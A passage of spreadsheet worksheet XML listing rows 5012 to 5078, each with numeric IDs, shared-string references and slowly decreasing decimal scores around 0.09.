    <row r="5012" ht="15.75" customHeight="1">
      <c r="A5012" s="1">
        <v>8939.0</v>
      </c>
      <c r="B5012" s="2">
        <v>5.4885111E7</v>
      </c>
      <c r="C5012" s="2" t="s">
        <v>4795</v>
      </c>
      <c r="D5012" s="2">
        <v>1.0</v>
      </c>
      <c r="E5012" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5012" s="2">
        <v>0.09694989106753814</v>
      </c>
    </row>
    <row r="5013" ht="15.75" customHeight="1">
      <c r="A5013" s="1">
        <v>264.0</v>
      </c>
      <c r="B5013" s="2">
        <v>1.5160273E7</v>
      </c>
      <c r="C5013" s="2" t="s">
        <v>4796</v>
      </c>
      <c r="D5013" s="2">
        <v>1.0</v>
      </c>
      <c r="E5013" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5013" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="5014" ht="15.75" customHeight="1">
      <c r="A5014" s="1">
        <v>637.0</v>
      </c>
      <c r="B5014" s="2">
        <v>1.974188E7</v>
      </c>
      <c r="C5014" s="2" t="s">
        <v>4797</v>
      </c>
      <c r="D5014" s="2">
        <v>1.0</v>
      </c>
      <c r="E5014" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5014" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="5015" ht="15.75" customHeight="1">
      <c r="A5015" s="1">
        <v>4828.0</v>
      </c>
      <c r="B5015" s="2">
        <v>4.3639761E7</v>
      </c>
      <c r="C5015" s="2" t="s">
        <v>4798</v>
      </c>
      <c r="D5015" s="2">
        <v>1.0</v>
      </c>
      <c r="E5015" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5015" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="5016" ht="15.75" customHeight="1">
      <c r="A5016" s="1">
        <v>8451.0</v>
      </c>
      <c r="B5016" s="2">
        <v>5.3967756E7</v>
      </c>
      <c r="C5016" s="2" t="s">
        <v>4799</v>
      </c>
      <c r="D5016" s="2">
        <v>1.0</v>
      </c>
      <c r="E5016" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5016" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="5017" ht="15.75" customHeight="1">
      <c r="A5017" s="1">
        <v>10488.0</v>
      </c>
      <c r="B5017" s="2">
        <v>1.1012906E7</v>
      </c>
      <c r="C5017" s="2" t="s">
        <v>4800</v>
      </c>
      <c r="D5017" s="2">
        <v>1.0</v>
      </c>
      <c r="E5017" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5017" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="5018" ht="15.75" customHeight="1">
      <c r="A5018" s="1">
        <v>12485.0</v>
      </c>
      <c r="B5018" s="2">
        <v>2.951101E7</v>
      </c>
      <c r="C5018" s="2" t="s">
        <v>4801</v>
      </c>
      <c r="D5018" s="2">
        <v>1.0</v>
      </c>
      <c r="E5018" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5018" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="5019" ht="15.75" customHeight="1">
      <c r="A5019" s="1">
        <v>12743.0</v>
      </c>
      <c r="B5019" s="2">
        <v>3.1084995E7</v>
      </c>
      <c r="C5019" s="2" t="s">
        <v>4802</v>
      </c>
      <c r="D5019" s="2">
        <v>1.0</v>
      </c>
      <c r="E5019" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5019" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="5020" ht="15.75" customHeight="1">
      <c r="A5020" s="1">
        <v>12818.0</v>
      </c>
      <c r="B5020" s="2">
        <v>3.1607367E7</v>
      </c>
      <c r="C5020" s="2" t="s">
        <v>4803</v>
      </c>
      <c r="D5020" s="2">
        <v>1.0</v>
      </c>
      <c r="E5020" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5020" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="5021" ht="15.75" customHeight="1">
      <c r="A5021" s="1">
        <v>13691.0</v>
      </c>
      <c r="B5021" s="2">
        <v>3.6111178E7</v>
      </c>
      <c r="C5021" s="2" t="s">
        <v>4804</v>
      </c>
      <c r="D5021" s="2">
        <v>1.0</v>
      </c>
      <c r="E5021" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5021" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="5022" ht="15.75" customHeight="1">
      <c r="A5022" s="1">
        <v>15167.0</v>
      </c>
      <c r="B5022" s="2">
        <v>4.2004434E7</v>
      </c>
      <c r="C5022" s="2" t="s">
        <v>4805</v>
      </c>
      <c r="D5022" s="2">
        <v>1.0</v>
      </c>
      <c r="E5022" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5022" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="5023" ht="15.75" customHeight="1">
      <c r="A5023" s="1">
        <v>18522.0</v>
      </c>
      <c r="B5023" s="2">
        <v>5.301791E7</v>
      </c>
      <c r="C5023" s="2" t="s">
        <v>4806</v>
      </c>
      <c r="D5023" s="2">
        <v>1.0</v>
      </c>
      <c r="E5023" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5023" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="5024" ht="15.75" customHeight="1">
      <c r="A5024" s="1">
        <v>13994.0</v>
      </c>
      <c r="B5024" s="2">
        <v>3.7383221E7</v>
      </c>
      <c r="C5024" s="2" t="s">
        <v>4807</v>
      </c>
      <c r="D5024" s="2">
        <v>1.0</v>
      </c>
      <c r="E5024" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5024" s="2">
        <v>0.09649122807017545</v>
      </c>
    </row>
    <row r="5025" ht="15.75" customHeight="1">
      <c r="A5025" s="1">
        <v>33225.0</v>
      </c>
      <c r="B5025" s="2">
        <v>7265359.0</v>
      </c>
      <c r="C5025" s="2" t="s">
        <v>4808</v>
      </c>
      <c r="D5025" s="2">
        <v>1.0</v>
      </c>
      <c r="E5025" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5025" s="2">
        <v>0.09649122807017543</v>
      </c>
    </row>
    <row r="5026" ht="15.75" customHeight="1">
      <c r="A5026" s="1">
        <v>11961.0</v>
      </c>
      <c r="B5026" s="2">
        <v>2.5616105E7</v>
      </c>
      <c r="C5026" s="2" t="s">
        <v>4809</v>
      </c>
      <c r="D5026" s="2">
        <v>1.0</v>
      </c>
      <c r="E5026" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5026" s="2">
        <v>0.09623015873015872</v>
      </c>
    </row>
    <row r="5027" ht="15.75" customHeight="1">
      <c r="A5027" s="1">
        <v>6900.0</v>
      </c>
      <c r="B5027" s="2">
        <v>4.9806179E7</v>
      </c>
      <c r="C5027" s="2" t="s">
        <v>4810</v>
      </c>
      <c r="D5027" s="2">
        <v>1.0</v>
      </c>
      <c r="E5027" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5027" s="2">
        <v>0.09623015873015871</v>
      </c>
    </row>
    <row r="5028" ht="15.75" customHeight="1">
      <c r="A5028" s="1">
        <v>1527.0</v>
      </c>
      <c r="B5028" s="2">
        <v>2.7426945E7</v>
      </c>
      <c r="C5028" s="2" t="s">
        <v>4811</v>
      </c>
      <c r="D5028" s="2">
        <v>1.0</v>
      </c>
      <c r="E5028" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5028" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="5029" ht="15.75" customHeight="1">
      <c r="A5029" s="1">
        <v>9461.0</v>
      </c>
      <c r="B5029" s="2">
        <v>5.5850869E7</v>
      </c>
      <c r="C5029" s="2" t="s">
        <v>4812</v>
      </c>
      <c r="D5029" s="2">
        <v>1.0</v>
      </c>
      <c r="E5029" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5029" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="5030" ht="15.75" customHeight="1">
      <c r="A5030" s="1">
        <v>18269.0</v>
      </c>
      <c r="B5030" s="2">
        <v>5.2205188E7</v>
      </c>
      <c r="C5030" s="2" t="s">
        <v>4813</v>
      </c>
      <c r="D5030" s="2">
        <v>1.0</v>
      </c>
      <c r="E5030" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5030" s="2">
        <v>0.09595959595959593</v>
      </c>
    </row>
    <row r="5031" ht="15.75" customHeight="1">
      <c r="A5031" s="1">
        <v>18865.0</v>
      </c>
      <c r="B5031" s="2">
        <v>5.4008394E7</v>
      </c>
      <c r="C5031" s="2" t="s">
        <v>4814</v>
      </c>
      <c r="D5031" s="2">
        <v>1.0</v>
      </c>
      <c r="E5031" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5031" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="5032" ht="15.75" customHeight="1">
      <c r="A5032" s="1">
        <v>25782.0</v>
      </c>
      <c r="B5032" s="2">
        <v>1.466195E7</v>
      </c>
      <c r="C5032" s="2" t="s">
        <v>4815</v>
      </c>
      <c r="D5032" s="2">
        <v>1.0</v>
      </c>
      <c r="E5032" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5032" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="5033" ht="15.75" customHeight="1">
      <c r="A5033" s="1">
        <v>32666.0</v>
      </c>
      <c r="B5033" s="2">
        <v>5930218.0</v>
      </c>
      <c r="C5033" s="2" t="s">
        <v>4816</v>
      </c>
      <c r="D5033" s="2">
        <v>1.0</v>
      </c>
      <c r="E5033" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5033" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="5034" ht="15.75" customHeight="1">
      <c r="A5034" s="1">
        <v>494.0</v>
      </c>
      <c r="B5034" s="2">
        <v>1.7664402E7</v>
      </c>
      <c r="C5034" s="2" t="s">
        <v>4817</v>
      </c>
      <c r="D5034" s="2">
        <v>1.0</v>
      </c>
      <c r="E5034" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5034" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="5035" ht="15.75" customHeight="1">
      <c r="A5035" s="1">
        <v>1251.0</v>
      </c>
      <c r="B5035" s="2">
        <v>2.5189344E7</v>
      </c>
      <c r="C5035" s="2" t="s">
        <v>4818</v>
      </c>
      <c r="D5035" s="2">
        <v>1.0</v>
      </c>
      <c r="E5035" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5035" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="5036" ht="15.75" customHeight="1">
      <c r="A5036" s="1">
        <v>1604.0</v>
      </c>
      <c r="B5036" s="2">
        <v>2.7815067E7</v>
      </c>
      <c r="C5036" s="2" t="s">
        <v>4819</v>
      </c>
      <c r="D5036" s="2">
        <v>1.0</v>
      </c>
      <c r="E5036" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5036" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="5037" ht="15.75" customHeight="1">
      <c r="A5037" s="1">
        <v>7336.0</v>
      </c>
      <c r="B5037" s="2">
        <v>5.0944622E7</v>
      </c>
      <c r="C5037" s="2" t="s">
        <v>4820</v>
      </c>
      <c r="D5037" s="2">
        <v>1.0</v>
      </c>
      <c r="E5037" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5037" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="5038" ht="15.75" customHeight="1">
      <c r="A5038" s="1">
        <v>7750.0</v>
      </c>
      <c r="B5038" s="2">
        <v>5.2087E7</v>
      </c>
      <c r="C5038" s="2" t="s">
        <v>4821</v>
      </c>
      <c r="D5038" s="2">
        <v>1.0</v>
      </c>
      <c r="E5038" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5038" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="5039" ht="15.75" customHeight="1">
      <c r="A5039" s="1">
        <v>15753.0</v>
      </c>
      <c r="B5039" s="2">
        <v>4.4140761E7</v>
      </c>
      <c r="C5039" s="2" t="s">
        <v>4822</v>
      </c>
      <c r="D5039" s="2">
        <v>1.0</v>
      </c>
      <c r="E5039" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5039" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="5040" ht="15.75" customHeight="1">
      <c r="A5040" s="1">
        <v>16603.0</v>
      </c>
      <c r="B5040" s="2">
        <v>4.7030158E7</v>
      </c>
      <c r="C5040" s="2" t="s">
        <v>4823</v>
      </c>
      <c r="D5040" s="2">
        <v>1.0</v>
      </c>
      <c r="E5040" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5040" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="5041" ht="15.75" customHeight="1">
      <c r="A5041" s="1">
        <v>18869.0</v>
      </c>
      <c r="B5041" s="2">
        <v>5.405105E7</v>
      </c>
      <c r="C5041" s="2" t="s">
        <v>4824</v>
      </c>
      <c r="D5041" s="2">
        <v>1.0</v>
      </c>
      <c r="E5041" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5041" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="5042" ht="15.75" customHeight="1">
      <c r="A5042" s="1">
        <v>20725.0</v>
      </c>
      <c r="B5042" s="2">
        <v>1.4661951E7</v>
      </c>
      <c r="C5042" s="2" t="s">
        <v>4825</v>
      </c>
      <c r="D5042" s="2">
        <v>1.0</v>
      </c>
      <c r="E5042" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5042" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="5043" ht="15.75" customHeight="1">
      <c r="A5043" s="1">
        <v>30396.0</v>
      </c>
      <c r="B5043" s="2">
        <v>3.8697142E7</v>
      </c>
      <c r="C5043" s="2" t="s">
        <v>4826</v>
      </c>
      <c r="D5043" s="2">
        <v>1.0</v>
      </c>
      <c r="E5043" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5043" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="5044" ht="15.75" customHeight="1">
      <c r="A5044" s="1">
        <v>30735.0</v>
      </c>
      <c r="B5044" s="2">
        <v>4.4029816E7</v>
      </c>
      <c r="C5044" s="2" t="s">
        <v>4827</v>
      </c>
      <c r="D5044" s="2">
        <v>1.0</v>
      </c>
      <c r="E5044" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5044" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="5045" ht="15.75" customHeight="1">
      <c r="A5045" s="1">
        <v>271.0</v>
      </c>
      <c r="B5045" s="2">
        <v>1.5293602E7</v>
      </c>
      <c r="C5045" s="2" t="s">
        <v>4828</v>
      </c>
      <c r="D5045" s="2">
        <v>1.0</v>
      </c>
      <c r="E5045" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5045" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="5046" ht="15.75" customHeight="1">
      <c r="A5046" s="1">
        <v>2785.0</v>
      </c>
      <c r="B5046" s="2">
        <v>3.5225903E7</v>
      </c>
      <c r="C5046" s="2" t="s">
        <v>4829</v>
      </c>
      <c r="D5046" s="2">
        <v>1.0</v>
      </c>
      <c r="E5046" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5046" s="2">
        <v>0.09538784067085955</v>
      </c>
    </row>
    <row r="5047" ht="15.75" customHeight="1">
      <c r="A5047" s="1">
        <v>7527.0</v>
      </c>
      <c r="B5047" s="2">
        <v>5.1457893E7</v>
      </c>
      <c r="C5047" s="2" t="s">
        <v>4830</v>
      </c>
      <c r="D5047" s="2">
        <v>1.0</v>
      </c>
      <c r="E5047" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5047" s="2">
        <v>0.09508547008547007</v>
      </c>
    </row>
    <row r="5048" ht="15.75" customHeight="1">
      <c r="A5048" s="1">
        <v>33215.0</v>
      </c>
      <c r="B5048" s="2">
        <v>7222866.0</v>
      </c>
      <c r="C5048" s="2" t="s">
        <v>4831</v>
      </c>
      <c r="D5048" s="2">
        <v>1.0</v>
      </c>
      <c r="E5048" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5048" s="2">
        <v>0.09482758620689653</v>
      </c>
    </row>
    <row r="5049" ht="15.75" customHeight="1">
      <c r="A5049" s="1">
        <v>2523.0</v>
      </c>
      <c r="B5049" s="2">
        <v>3.4033567E7</v>
      </c>
      <c r="C5049" s="2" t="s">
        <v>4832</v>
      </c>
      <c r="D5049" s="2">
        <v>1.0</v>
      </c>
      <c r="E5049" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5049" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="5050" ht="15.75" customHeight="1">
      <c r="A5050" s="1">
        <v>3502.0</v>
      </c>
      <c r="B5050" s="2">
        <v>3.8521482E7</v>
      </c>
      <c r="C5050" s="2" t="s">
        <v>4833</v>
      </c>
      <c r="D5050" s="2">
        <v>1.0</v>
      </c>
      <c r="E5050" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5050" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="5051" ht="15.75" customHeight="1">
      <c r="A5051" s="1">
        <v>3990.0</v>
      </c>
      <c r="B5051" s="2">
        <v>4.0854912E7</v>
      </c>
      <c r="C5051" s="2" t="s">
        <v>4834</v>
      </c>
      <c r="D5051" s="2">
        <v>1.0</v>
      </c>
      <c r="E5051" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5051" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="5052" ht="15.75" customHeight="1">
      <c r="A5052" s="1">
        <v>4125.0</v>
      </c>
      <c r="B5052" s="2">
        <v>4.1378967E7</v>
      </c>
      <c r="C5052" s="2" t="s">
        <v>4835</v>
      </c>
      <c r="D5052" s="2">
        <v>1.0</v>
      </c>
      <c r="E5052" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5052" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="5053" ht="15.75" customHeight="1">
      <c r="A5053" s="1">
        <v>5659.0</v>
      </c>
      <c r="B5053" s="2">
        <v>4.6290083E7</v>
      </c>
      <c r="C5053" s="2" t="s">
        <v>4836</v>
      </c>
      <c r="D5053" s="2">
        <v>1.0</v>
      </c>
      <c r="E5053" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5053" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="5054" ht="15.75" customHeight="1">
      <c r="A5054" s="1">
        <v>9526.0</v>
      </c>
      <c r="B5054" s="2">
        <v>5.5980269E7</v>
      </c>
      <c r="C5054" s="2" t="s">
        <v>4837</v>
      </c>
      <c r="D5054" s="2">
        <v>1.0</v>
      </c>
      <c r="E5054" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5054" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="5055" ht="15.75" customHeight="1">
      <c r="A5055" s="1">
        <v>9786.0</v>
      </c>
      <c r="B5055" s="2">
        <v>5.6518536E7</v>
      </c>
      <c r="C5055" s="2" t="s">
        <v>4838</v>
      </c>
      <c r="D5055" s="2">
        <v>1.0</v>
      </c>
      <c r="E5055" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5055" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="5056" ht="15.75" customHeight="1">
      <c r="A5056" s="1">
        <v>12062.0</v>
      </c>
      <c r="B5056" s="2">
        <v>2.6526781E7</v>
      </c>
      <c r="C5056" s="2" t="s">
        <v>4839</v>
      </c>
      <c r="D5056" s="2">
        <v>1.0</v>
      </c>
      <c r="E5056" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5056" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="5057" ht="15.75" customHeight="1">
      <c r="A5057" s="1">
        <v>13422.0</v>
      </c>
      <c r="B5057" s="2">
        <v>3.506923E7</v>
      </c>
      <c r="C5057" s="2" t="s">
        <v>4840</v>
      </c>
      <c r="D5057" s="2">
        <v>1.0</v>
      </c>
      <c r="E5057" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5057" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="5058" ht="15.75" customHeight="1">
      <c r="A5058" s="1">
        <v>16454.0</v>
      </c>
      <c r="B5058" s="2">
        <v>4.6432948E7</v>
      </c>
      <c r="C5058" s="2" t="s">
        <v>4841</v>
      </c>
      <c r="D5058" s="2">
        <v>1.0</v>
      </c>
      <c r="E5058" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5058" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="5059" ht="15.75" customHeight="1">
      <c r="A5059" s="1">
        <v>16727.0</v>
      </c>
      <c r="B5059" s="2">
        <v>4.7493103E7</v>
      </c>
      <c r="C5059" s="2" t="s">
        <v>4842</v>
      </c>
      <c r="D5059" s="2">
        <v>1.0</v>
      </c>
      <c r="E5059" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5059" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="5060" ht="15.75" customHeight="1">
      <c r="A5060" s="1">
        <v>17705.0</v>
      </c>
      <c r="B5060" s="2">
        <v>5.0593729E7</v>
      </c>
      <c r="C5060" s="2" t="s">
        <v>4843</v>
      </c>
      <c r="D5060" s="2">
        <v>1.0</v>
      </c>
      <c r="E5060" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5060" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="5061" ht="15.75" customHeight="1">
      <c r="A5061" s="1">
        <v>19029.0</v>
      </c>
      <c r="B5061" s="2">
        <v>5.455289E7</v>
      </c>
      <c r="C5061" s="2" t="s">
        <v>4844</v>
      </c>
      <c r="D5061" s="2">
        <v>1.0</v>
      </c>
      <c r="E5061" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5061" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="5062" ht="15.75" customHeight="1">
      <c r="A5062" s="1">
        <v>23703.0</v>
      </c>
      <c r="B5062" s="2">
        <v>7109006.0</v>
      </c>
      <c r="C5062" s="2" t="s">
        <v>4845</v>
      </c>
      <c r="D5062" s="2">
        <v>1.0</v>
      </c>
      <c r="E5062" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5062" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="5063" ht="15.75" customHeight="1">
      <c r="A5063" s="1">
        <v>27412.0</v>
      </c>
      <c r="B5063" s="2">
        <v>2.1815326E7</v>
      </c>
      <c r="C5063" s="2" t="s">
        <v>4846</v>
      </c>
      <c r="D5063" s="2">
        <v>1.0</v>
      </c>
      <c r="E5063" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5063" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="5064" ht="15.75" customHeight="1">
      <c r="A5064" s="1">
        <v>28959.0</v>
      </c>
      <c r="B5064" s="2">
        <v>2.9786487E7</v>
      </c>
      <c r="C5064" s="2" t="s">
        <v>4847</v>
      </c>
      <c r="D5064" s="2">
        <v>1.0</v>
      </c>
      <c r="E5064" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5064" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="5065" ht="15.75" customHeight="1">
      <c r="A5065" s="1">
        <v>31959.0</v>
      </c>
      <c r="B5065" s="2">
        <v>5.3104594E7</v>
      </c>
      <c r="C5065" s="2" t="s">
        <v>4848</v>
      </c>
      <c r="D5065" s="2">
        <v>1.0</v>
      </c>
      <c r="E5065" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5065" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="5066" ht="15.75" customHeight="1">
      <c r="A5066" s="1">
        <v>30749.0</v>
      </c>
      <c r="B5066" s="2">
        <v>4.4136259E7</v>
      </c>
      <c r="C5066" s="2" t="s">
        <v>4849</v>
      </c>
      <c r="D5066" s="2">
        <v>1.0</v>
      </c>
      <c r="E5066" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5066" s="2">
        <v>0.09424603174603173</v>
      </c>
    </row>
    <row r="5067" ht="15.75" customHeight="1">
      <c r="A5067" s="1">
        <v>28396.0</v>
      </c>
      <c r="B5067" s="2">
        <v>2.626623E7</v>
      </c>
      <c r="C5067" s="2" t="s">
        <v>4850</v>
      </c>
      <c r="D5067" s="2">
        <v>1.0</v>
      </c>
      <c r="E5067" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5067" s="2">
        <v>0.09424603174603172</v>
      </c>
    </row>
    <row r="5068" ht="15.75" customHeight="1">
      <c r="A5068" s="1">
        <v>16011.0</v>
      </c>
      <c r="B5068" s="2">
        <v>4.5016897E7</v>
      </c>
      <c r="C5068" s="2" t="s">
        <v>4851</v>
      </c>
      <c r="D5068" s="2">
        <v>1.0</v>
      </c>
      <c r="E5068" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5068" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="5069" ht="15.75" customHeight="1">
      <c r="A5069" s="1">
        <v>7642.0</v>
      </c>
      <c r="B5069" s="2">
        <v>5.1773894E7</v>
      </c>
      <c r="C5069" s="2" t="s">
        <v>4852</v>
      </c>
      <c r="D5069" s="2">
        <v>1.0</v>
      </c>
      <c r="E5069" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5069" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="5070" ht="15.75" customHeight="1">
      <c r="A5070" s="1">
        <v>24258.0</v>
      </c>
      <c r="B5070" s="2">
        <v>1.052486E7</v>
      </c>
      <c r="C5070" s="2" t="s">
        <v>4853</v>
      </c>
      <c r="D5070" s="2">
        <v>1.0</v>
      </c>
      <c r="E5070" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5070" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="5071" ht="15.75" customHeight="1">
      <c r="A5071" s="1">
        <v>30491.0</v>
      </c>
      <c r="B5071" s="2">
        <v>3993072.0</v>
      </c>
      <c r="C5071" s="2" t="s">
        <v>4854</v>
      </c>
      <c r="D5071" s="2">
        <v>1.0</v>
      </c>
      <c r="E5071" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5071" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="5072" ht="15.75" customHeight="1">
      <c r="A5072" s="1">
        <v>30040.0</v>
      </c>
      <c r="B5072" s="2">
        <v>3.6211665E7</v>
      </c>
      <c r="C5072" s="2" t="s">
        <v>4855</v>
      </c>
      <c r="D5072" s="2">
        <v>1.0</v>
      </c>
      <c r="E5072" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5072" s="2">
        <v>0.09329140461215933</v>
      </c>
    </row>
    <row r="5073" ht="15.75" customHeight="1">
      <c r="A5073" s="1">
        <v>13551.0</v>
      </c>
      <c r="B5073" s="2">
        <v>3.5659102E7</v>
      </c>
      <c r="C5073" s="2" t="s">
        <v>4856</v>
      </c>
      <c r="D5073" s="2">
        <v>1.0</v>
      </c>
      <c r="E5073" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5073" s="2">
        <v>0.09294871794871794</v>
      </c>
    </row>
    <row r="5074" ht="15.75" customHeight="1">
      <c r="A5074" s="1">
        <v>13742.0</v>
      </c>
      <c r="B5074" s="2">
        <v>3.6456329E7</v>
      </c>
      <c r="C5074" s="2" t="s">
        <v>4857</v>
      </c>
      <c r="D5074" s="2">
        <v>1.0</v>
      </c>
      <c r="E5074" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5074" s="2">
        <v>0.09294871794871794</v>
      </c>
    </row>
    <row r="5075" ht="15.75" customHeight="1">
      <c r="A5075" s="1">
        <v>28677.0</v>
      </c>
      <c r="B5075" s="2">
        <v>2.7546354E7</v>
      </c>
      <c r="C5075" s="2" t="s">
        <v>4858</v>
      </c>
      <c r="D5075" s="2">
        <v>1.0</v>
      </c>
      <c r="E5075" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5075" s="2">
        <v>0.09291187739463601</v>
      </c>
    </row>
    <row r="5076" ht="15.75" customHeight="1">
      <c r="A5076" s="1">
        <v>3800.0</v>
      </c>
      <c r="B5076" s="2">
        <v>3.998532E7</v>
      </c>
      <c r="C5076" s="2" t="s">
        <v>4859</v>
      </c>
      <c r="D5076" s="2">
        <v>1.0</v>
      </c>
      <c r="E5076" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5076" s="2">
        <v>0.09259259259259259</v>
      </c>
    </row>
    <row r="5077" ht="15.75" customHeight="1">
      <c r="A5077" s="1">
        <v>10991.0</v>
      </c>
      <c r="B5077" s="2">
        <v>1.7425083E7</v>
      </c>
      <c r="C5077" s="2" t="s">
        <v>4860</v>
      </c>
      <c r="D5077" s="2">
        <v>1.0</v>
      </c>
      <c r="E5077" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5077" s="2">
        <v>0.09259259259259259</v>
      </c>
    </row>
    <row r="5078" ht="15.75" customHeight="1">
      <c r="A5078" s="1">
        <v>294.0</v>
      </c>
      <c r="B5078" s="2">
        <v>1.5474386E7</v>
      </c>
      <c r="C5078" s="2" t="s">
        <v>4861</v>
      </c>
      <c r="D5078" s="2">
        <v>1.0</v>
      </c>
      <c r="E5078" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5078" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
